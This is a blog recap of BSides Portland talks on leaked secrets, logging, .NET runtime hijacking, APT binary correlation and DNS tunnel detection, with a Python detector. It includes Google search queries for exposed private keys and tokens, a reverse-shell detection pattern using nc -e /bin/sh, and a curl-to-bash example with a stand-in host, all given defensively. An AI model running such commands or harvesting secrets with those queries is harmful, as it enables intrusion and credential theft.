BSides PDX! My first BSides was last year and ever since, I’ve been counting down to this year’s event. For those of you who are not familiar with BSides, the idea behind it is to provide an easily accessible security conference at local venues around the world and to foster activity for the local security community. That being said, this year’s BSides Portland did not disappoint. Below are some highlights from some of my favorite talks.
Mike Ossmann: Your Ideas Are Worthless
Mike Ossmann delivered a thought-provoking keynote which really stuck with me. The title initially threw me off, implying that my ideas were worthless. Mike expanded on that title throughout his keynote, though: he explained that ideas are worthless unless you share them.
He went on to illustrate the point with the example of someone having a brilliant idea but keeping it to themselves. No matter how brilliant or impactful the idea may be, it is truly worthless unless it is shared and acted upon.
I believe that message was a great way to kick off BSides, a conference dedicated to sharing security research with the community.
Ben Hughes: Security for Non-Unicorns
Ben Hughes is a security engineer at Etsy, and he presented on many of the frustrations he has encountered securing infrastructure.
For instance, corporate infrastructure has evolved from systems behind a firewall to systems on both sides (thanks cloud!). From a security operations perspective, this means corporations need to protect their information, which lives on systems they may not have full control over.
A great example Ben showed was searching Google for GitHub security tokens and SSH keys (search Google for site:github.com dotfiles “BEGIN RSA PRIVATE KEY” and site:github.com dotfiles gitconfig token to get an idea). Developers can get sloppy and unintentionally post sensitive information to a project. Ben recommended organizations use GitRob to help them find sensitive information their developers may have accidentally uploaded.
Logging and alerting were another component Ben stressed. He offered some helpful hints for dealing with multi-line logs, such as using the Logstash multiline filter, and suggested alerting whenever your system sees “/bin/nc *-e /bin/sh*” (a common syntax for reverse shells).
Another great thing to look out for is users piping downloaded shell scripts directly to their shell, for example curl notevil.net/runThis.sh | bash. That blindly runs whatever script the server returns in your terminal, which obviously hands complete control of the system to notevil.net. Despite its obvious issues, this is far more common than one would expect (see this Tumblr dedicated just to it).
Lastly, Ben touched on Docker security, more specifically on the lack of security in many Docker images. Some tips to stay secure are to not run things as root, to use Docker Notary, and to implement grsecurity or SELinux.
There were a few other topics Ben discussed, but these are the ones that stuck out to me the most. Check out the rest of his topics here.
Topher Timzen: Hijacking .NET Application Control Flow
Topher demoed his projects GrayFrost and GrayStorm, and how they can be used in conjunction to hijack .NET applications.
Yes, .NET is the framework we all love to hate. For those who need a quick and dirty tutorial: most programming languages are compiled into machine code, which is then delivered as binaries. .NET, similar to Java, is instead compiled to intermediate code for the common language runtime (CLR), which is then just-in-time (JIT) compiled to machine code at runtime.
This has many advantages, but a glaring security disadvantage is that nefarious users can take advantage of JIT, reverse engineer the code and inject their own values for variables.
Topher showed a simple attack in which he injected his GrayFrost DLL into a .NET application and then used GrayStorm to edit variables at runtime. This could be used to bypass authentication mechanisms, edit validated input and much more.
This is a tough pill to swallow for those in charge of securing .NET applications because even though developers can be trained to code securely (sanitize input, encrypt sensitive strings, etc.), .NET applications can still be undermined by the techniques Topher demonstrated.
Learn more about Topher’s presentation here and check out his GrayFrost and GrayStorm GitHub.
Bhavna Soman: Ninja Correlation of APT Binaries
Bhavna took an analytical approach to finding correlations between APT binaries identified by their MD5 hashes. She took several such binaries and ran them through imphash, ssdeep and sdhash. She then assessed any clusters for similar attributes relating to Actor Name, Campaign Name, Malware Family, or Aliases.
Her results show that the algorithms were able to identify similar APT binaries starting from their MD5 hashes. I foresee this possibly being used to identify 0-day binaries based on previously discovered binaries by correlating their hashes.
Check out her presentation slides here.
Shadejinx: Tunnel Vision
Another of my favorite talks was done by Shadejinx, where he spoke about how he used logging tools to detect DNS tunnels in his environment. DNS tunneling is a technique used to stealthily extract data or communicate outside of a protected network. However, as Shadejinx pointed out, DNS tunnels in general are not very stealthy.
DNS, being a common protocol and essential to web browsing, is often allowed to exit an organization’s network, whereas other communication protocols that attackers prefer (such as SSH) are not. As a defender, detecting a DNS tunnel is essential to knowing whether company data is unknowingly leaving your network or whether a breach has occurred.
For those organizations that use logging to their advantage, detecting DNS tunneling should be simple. As Shadejinx explained, DNS tunnels are generally very noisy: they create an extraordinary number of DNS requests, and their FQDNs are abnormally long.
Looking at one’s own dataset, expected thresholds for DNS request volume and FQDN length should be derived, and some sort of alerting system should then be in place for anything that exceeds the chosen criteria. Shadejinx also provides a Python tool on GitHub to help analysts parse through DNS log files and find evidence of DNS tunnels in their environment.
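The two signals Shadejinx describes, request volume per client and FQDN length, as a small detector run over constructed DNS query log lines. This is an added example, not Shadejinx's tool; the BIND-style query-log format, the client IPs and the tunnel.test domain are assumptions made for the example.

```python
import re
from collections import Counter
from statistics import mean, pstdev

# Constructed baseline of normal-looking queries (BIND-style query-log format
# is assumed; these lines are made up, not captured data).
BASELINE_LOG = """\
client 10.0.0.5#53211: query: www.example.com IN A
client 10.0.0.5#53212: query: mail.example.com IN MX
client 10.0.0.5#53213: query: vpn.example.com IN A
client 10.0.0.7#41000: query: cdn.example.org IN A
client 10.0.0.7#41001: query: static.example.org IN A
client 10.0.0.8#39001: query: login.example.com IN A
"""

# Same baseline plus a constructed tunnel client (10.0.0.9) sending many
# queries with long hex-encoded labels under a hypothetical domain.
SUSPECT_LOG = BASELINE_LOG + "".join(
    "client 10.0.0.9#5%04d: query: %032x.%032x.t.tunnel.test IN TXT\n"
    % (i, i * 7919, i * 104729)
    for i in range(40))

QUERY_RE = re.compile(r"client (\S+?)#\d+: query: (\S+) IN (\S+)")


def parse(log_text):
    """Return (client_ip, fqdn) for every line that matches the query format."""
    return [m.group(1, 2) for m in map(QUERY_RE.search, log_text.splitlines()) if m]


def derive_thresholds(baseline_records, k=3.0):
    """Derive thresholds from a window of known-good traffic, as the talk
    recommends: mean + k * stdev of FQDN length and of per-client query count."""
    lengths = [len(fqdn) for _, fqdn in baseline_records]
    counts = list(Counter(ip for ip, _ in baseline_records).values())
    return (mean(lengths) + k * pstdev(lengths),
            mean(counts) + k * pstdev(counts))


def detect(records, max_len, max_count):
    """Return {client_ip: set(reasons)} for clients exceeding either threshold."""
    alerts = {}
    for ip, fqdn in records:
        if len(fqdn) > max_len:
            alerts.setdefault(ip, set()).add("long-fqdn")
    for ip, n in Counter(ip for ip, _ in records).items():
        if n > max_count:
            alerts.setdefault(ip, set()).add("high-volume")
    return alerts


if __name__ == "__main__":
    max_len, max_count = derive_thresholds(parse(BASELINE_LOG))
    for ip, reasons in detect(parse(SUSPECT_LOG), max_len, max_count).items():
        print(ip, sorted(reasons))
```

In practice the baseline window should be large and cover a full business cycle, otherwise a quiet period yields thresholds that alert on ordinary traffic.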
I spoke with Shadejinx briefly after his presentation and thanked him for doing a presentation from a blue team perspective. Many of the presentations at BSides were all about how to break things, so it was nice to see a defender providing some knowledge to the community about how to defend against an attack.
All in all, BSides PDX was a great opportunity to learn more about current research, network with other infosec professionals, and even try some new things. For instance, this year’s BSides PDX had a Lock Pick Village where you could learn to pick locks, a capture the flag station run by Vegan Zombies (Portland’s #1 CTF team), and you could even mine Bitcoin.
Several workshops were also held to give attendees some hands-on exercises, such as learning to exploit hardware with JTAG, how to defend against UEFI attacks, or how to use crypto tools effectively – a fantastic value for a free* security conference!
A big thank you to the organizers and I look forward to next year’s edition! Be sure to follow @BSidesPDX on Twitter and check out the #bsidespdx hashtag to see what else you missed.
*Donations are always welcome, of course, and it gets you some more swag :)